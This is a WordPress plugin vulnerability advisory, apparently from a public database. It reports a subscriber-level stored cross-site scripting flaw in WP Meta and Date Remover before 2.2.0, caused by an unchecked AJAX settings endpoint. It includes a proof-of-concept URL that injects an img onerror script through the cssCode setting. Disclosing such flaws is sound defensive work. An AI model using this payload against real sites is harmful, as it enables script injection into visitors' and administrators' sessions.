WordPress Plugin Vulnerabilities
WP Meta and Date Remover < 2.2.0 - Subscriber+ Stored XSS
Description
The plugin provides an AJAX endpoint for configuring the plugin settings. This endpoint has no capability checks and does not sanitize the user input, which is then later output unescaped. Allowing any authenticated users, such as subscriber change them and perform Stored Cross-Site Scripting.
Note: A partial fix was released in v2.1.0, but stored XSS was still possible for users with Admin+ privileges
Proof of Concept
Open the following URL when logged in as a subscriber: `https://example.com/wp-admin/admin-ajax.php?action=update_settings&settings[removeByCSS]=true&settings[removeFromHome]=true&settings[cssCode]=</style><img src%3D1 onerror%3Dalert(document.domain)>` The XSS will be triggered in any pages (both frontend and backend)
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-10-09 (about 7 months ago)
Added
2023-10-09 (about 7 months ago)
Last Updated
2023-10-09 (about 7 months ago)